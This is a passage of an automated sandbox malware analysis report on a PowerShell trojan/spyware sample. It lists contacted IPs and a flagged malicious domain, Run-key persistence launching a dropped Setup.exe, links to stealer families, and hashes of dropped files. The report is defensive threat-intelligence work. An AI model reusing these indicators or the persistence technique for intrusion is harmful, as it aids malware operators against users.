                                                                                                                              https://store.steampowered.com/app/Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://cf.icq.com/cf/icqlite/download_p.html4Pleasepowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://cf.icq.com/cf/icqlite/liteskin.htmlpowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://crl.mSetup.exe, 00000004.00000002.1937699417.0000029C06880000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013467032.000002563FFF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ypowershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgmsiexec.exe, 0000000A.00000003.2121754732.000000000078A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?msiexec.exe, 0000000A.00000003.2120077314.0000000005550000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&umsiexec.exe, 0000000A.00000003.2121754732.000000000078A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.openssl.org/HSetup.exe, 00000004.00000002.2003851978.00007FFBA1D8A000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000004.00000002.2041202326.00007FFBA9C29000.00000002.00000001.01000000.00000010.sdmp, Setup.exe, 00000004.00000003.1903329765.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000003.1994011222.000002563DED9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2069435347.00007FFBA1D8A000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000007.00000002.2084881953.00007FFBA9C29000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&ctamsiexec.exe, 0000000A.00000003.2121754732.000000000078A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://aka.ms/pscore68powershell.exe, 00000001.00000002.1820039658.00000198B8FD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://electricity.co.ke)powershell.exe, 00000001.00000002.1820039658.00000198B9C2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9BF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://bugreports.qt.io/_q_receiveReplyensureClientPrefaceSentMicrosoft-IIS/4.Microsoft-IIS/5.NetscaSetup.exe, 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp, Setup.exe, 00000007.00000002.2050033866.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://wwp.icq.com/%dBThepowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.globalsign.net/repository/03powershell.exe, 00000001.00000002.1820039658.00000198BB26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB447000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high

                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                        Public IPs

                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                        188.114.97.3
                                                                                                                                                        		5ptit5tuded.cyouEuropean Union
                                                                                                                                                        		13335CLOUDFLARENETUStrue
                                                                                                                                                        172.67.75.40
                                                                                                                                                        		rentry.coUnited States
                                                                                                                                                        		13335CLOUDFLARENETUSfalse

                                                                                                                                                        General Information

                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                        Analysis ID:1558794
                                                                                                                                                        Start date and time:2024-11-19 20:04:26 +01:00
                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                        Overall analysis duration:0h 12m 24s
                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                        Report type:full
                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                        Number of analysed new started processes analysed:18
                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Sample name:xaSPJNbl.ps1
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal100.troj.spyw.evad.winPS1@19/176@2/2
                                                                                                                                                        EGA Information:Failed
                                                                                                                                                        HCA Information:Failed
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Found application associated with file extension: .ps1

                                                                                                                                                        Warnings

                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                        • Execution Graph export aborted for target Setup.exe, PID 348 because there are no executed function
                                                                                                                                                        • Execution Graph export aborted for target Setup.exe, PID 4260 because there are no executed function
                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                        • VT rate limit hit for: xaSPJNbl.ps1

                                                                                                                                                        Simulations

                                                                                                                                                        Behavior and APIs

                                                                                                                                                        TimeTypeDescription
                                                                                                                                                        14:05:48API Interceptor43x Sleep call for process: powershell.exe modified
                                                                                                                                                        14:06:24API Interceptor8x Sleep call for process: msiexec.exe modified
                                                                                                                                                        20:06:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                        20:06:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe

                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                        IPs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        188.114.97.3PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.ssrnoremt-rise.sbs/3jsc/
                                                                                                                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • filetransfer.io/data-package/zWkbOqX7/download
                                                                                                                                                        http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                                                        • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                                                                        gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                                                                                        Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                        • gmtagency.online/api/check
                                                                                                                                                        View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                        • f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
                                                                                                                                                        SWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                        • paste.ee/d/YU1NN
                                                                                                                                                        TT copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.lnnn.fun/u5w9/
                                                                                                                                                        QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • filetransfer.io/data-package/iiEh1iM3/download
                                                                                                                                                        Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • paste.ee/d/dc8Ru
                                                                                                                                                        172.67.75.40zkGOUJOnmc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • arc-gym.com.cutestat.com/wp-login.php

                                                                                                                                                        Domains

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        rentry.coExploit Detector.batGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        MilwaukeeRivers.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        http://www.thearchiterra.gr/Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.26.2.16
                                                                                                                                                        RobCheat.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        Spedizione.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        sims-4-updater-v1.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        SecuriteInfo.com.Python.Stealer.1545.20368.28754.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                                                        • 104.26.2.16
                                                                                                                                                        grA6aqodO5.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                                                        • 104.26.3.16
                                                                                                                                                        SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeGet hashmaliciousXWormBrowse
                                                                                                                                                        • 104.26.3.16
                                                                                                                                                        nkYzjyrKYK.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                        • 104.26.3.16

                                                                                                                                                        ASNs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        CLOUDFLARENETUShttp://user.ecomab.ccGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        https://trimmer.to:443/GWHMYGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 104.17.25.14
                                                                                                                                                        Your_Bonus_Breakdown_2024.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        Your_Bonus_Breakdown_2024.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.18.95.41
                                                                                                                                                        https://hopp.bio/wchnGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 1.1.1.1
                                                                                                                                                        https://hmjpvx0wn1.gaimensebb.shop/Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                                                        • 104.26.13.205
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        Benefit Enrollment -eGz8VNb.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        mainbas.batGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.16.230.132
                                                                                                                                                        bas.batGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.16.230.132
                                                                                                                                                        CLOUDFLARENETUShttp://user.ecomab.ccGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        https://trimmer.to:443/GWHMYGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 104.17.25.14
                                                                                                                                                        Your_Bonus_Breakdown_2024.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        Your_Bonus_Breakdown_2024.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.18.95.41
                                                                                                                                                        https://hopp.bio/wchnGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 1.1.1.1
                                                                                                                                                        https://hmjpvx0wn1.gaimensebb.shop/Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                                                        • 104.26.13.205
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        Benefit Enrollment -eGz8VNb.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        mainbas.batGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.16.230.132
                                                                                                                                                        bas.batGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.16.230.132

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        EIR5pTRn9R.exeGet hashmaliciousDragonForceBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40

                                                                                                                                                        Dropped Files

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        C:\Users\user\AppData\Roaming\DUC\libcrypto-1_1-x64.dll4OVYJHCTFA.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):26604
                                                                                                                                                          Entropy (8bit):5.053909410690657
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:SLbV3IpNBQkj2Uh4iUxkOZhxsardFfJ+OdBOtAHkvNZzNKe1MlYoaYP:SLbV3CNBQkj2Uh4iUxkOeqdJJ+OdBOtW
                                                                                                                                                          MD5:7D2AEE50616E1DA59B1C6D051B499807
                                                                                                                                                          SHA1:9FEF7842532F7EF1990C6A0AE9F07988238A326E
                                                                                                                                                          SHA-256:43E0A755EF686E8493E49832F595D75241DA0573791F7DAFC0C1672F1A267DEA
                                                                                                                                                          SHA-512:BAC9620D053B35485F1FE104710943F716DF769E532159A667E235F59DBF954B217BD0F13DE2C5857DE842D994BD1F10911F9690C78B54DA01B22716FDF343A8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:PSMODULECACHE.(...m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):64
                                                                                                                                                          Entropy (8bit):0.7307872139132228
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Nlllul4/X:NllU4/
                                                                                                                                                          MD5:3C34689C4BD27F7A51A67BBD54FA65C2
                                                                                                                                                          SHA1:E444E6B6E24D2FE2ACE5A5A7D96A6142C2368735
                                                                                                                                                          SHA-256:4B7DAB4629E6B8CC1CD6E404CB5FC110296C3D0F4E3FDBBDB0C1CE48B5B8A546
                                                                                                                                                          SHA-512:02827A36A507539C617DFE05EDF5367EB295EB80172794D83F3E9AF612125B7CA88218C2601DFA8E0E98888061A0C7B0E78428188523FA915F39B23F148F8766
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:@...e.................................,.........................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (8771), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8771
                                                                                                                                                          Entropy (8bit):6.163137107759708
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:PN2x2BRm1fzHSJfB8ukob5xZs0P68q8SW/Yuj+y1uN:Ax/1fwVkEnZBSjuDuN
                                                                                                                                                          MD5:5D04B96A8949E10A0DB05D25A4A8A7BC
                                                                                                                                                          SHA1:1102A91A46F54A8C966B2A25F2EB8629665FF65D
                                                                                                                                                          SHA-256:FCFD08382B1513C7521CEF3FFC51A29946D78B95E9A48F294A1EE2A26B721513
                                                                                                                                                          SHA-512:5226FEB03D57D13411446F2845E9839F791D92DF8D6FE6FEB60FC4A7B8AE5FE9137389D0B3A695651D02AF2661F367060AE6866374258B62C3B4C65C9230A404
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0i

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\9bc8a9d8

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1049549
                                                                                                                                                          Entropy (8bit):7.556880588296405
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:zSszeJzbiUDrxN0a4Qp6JVfYcQtCBGQ0ZL:zS2euUDKVfYH06ZL
                                                                                                                                                          MD5:55019EA70B43BEDE1E4CD5BD07359715
                                                                                                                                                          SHA1:513FD7ABDA66FD14853935720AC38E22E343BA75
                                                                                                                                                          SHA-256:B69FC703AC69B1ED4F5DDBE97DE813C26B53662E276D886788315CF6EC1447AA
                                                                                                                                                          SHA-512:C6E08FF7F2627F0215E09E846B1542C88EF34445F8279510538F004CF8A5CFBC0FA1DF01A7D84ACE8A35E20A664F9DB69E5F5745EB305D3B542951DF11BFFFC7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^..&^..~...z...c7..A-..Z...@:..]...O,..c;..r...I,..]...O,..^^...^...^...^...^...^...^...^...^...^...^...^..g0..G?..T;...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^..m,..Z;..]*..M;...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^..g...|{..G=..]1......r...C;..\5...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...n...i...^...^...^...^...^...^...^...^...^...^...^

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3iugvkdy.lbh.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edqstl2k.y1q.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gelflxta.b24.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2xn2ioy.ztk.psm1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oa1sukry.yfu.ps1

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
